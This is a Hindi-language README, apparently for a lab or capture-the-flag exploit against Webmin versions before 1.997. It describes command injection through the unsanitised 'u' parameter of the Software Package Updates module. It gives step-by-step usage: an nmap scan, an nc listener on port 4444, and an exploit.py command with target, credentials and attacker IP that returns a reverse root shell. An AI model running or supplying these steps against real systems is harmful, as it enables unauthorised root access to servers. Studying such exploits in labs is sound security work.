
Webmin < 1.997 के लिए सॉफ़्टवेयर पैकेज अपडेट मॉड्यूल के माध्यम से प्रमाणित रिमोट कोड निष्पादन एक्सप्लॉइट। अनसैनिटाइज़्ड पैरामीटर के माध्यम से रूट के रूप में मनमाने कमांड इंजेक्ट करता है, रिवर्स शेल वितरित करता है।
यह शोषण Webmin के 1.997 से पहले के संस्करणों में रिमोट कोड निष्पादन (RCE) भेद्यता के लिए है, सॉफ्टवेयर पैकेज अपडेट मॉड्यूल के माध्यम से।
Webmin का Software Package Updates मॉड्यूल सिस्टम में पास करने से पहले u पैरामीटर को सही ढंग से सैनिटाइज़ नहीं करता है। उस मॉड्यूल तक पहुँच वाला एक प्रमाणित उपयोगकर्ता मनमाने आदेश इंजेक्ट कर सकता है जो रूट के रूप में निष्पादित होते हैं।
शोषण चलाने से पहले निर्भरताएँ स्थापित करें:
pip3 install requests beautifulsoup4 lxml urllib3
| पैरामीटर | विवरण | उदाहरण |
|---|
-t | लक्ष्य का URL (पोर्ट के बिना) | https://192.168.1.10 |
-u | Webmin उपयोगकर्ता | admin |
-p | Webmin पासवर्ड | password123 |
-l | आपका आईपी (जहाँ आप शेल प्राप्त करते हैं) | 192.168.1.5 |
-lp | वह पोर्ट जहाँ आप सुन रहे हैं | 4444 |
1 — Nmap से लक्ष्य का आईपी पता करें:
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin
2 — अपनी मशीन पर लिसनर खोलें:
nc -lvnp 4444
3 — दूसरे टर्मिनल में, शोषण चलाएँ:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — यदि शोषण सफल होता है तो आप देखेंगे:
5 — लिसनर में आपको रूट के रूप में एक शेल प्राप्त होगा:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminal 1
nc -lvnp 4444
# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444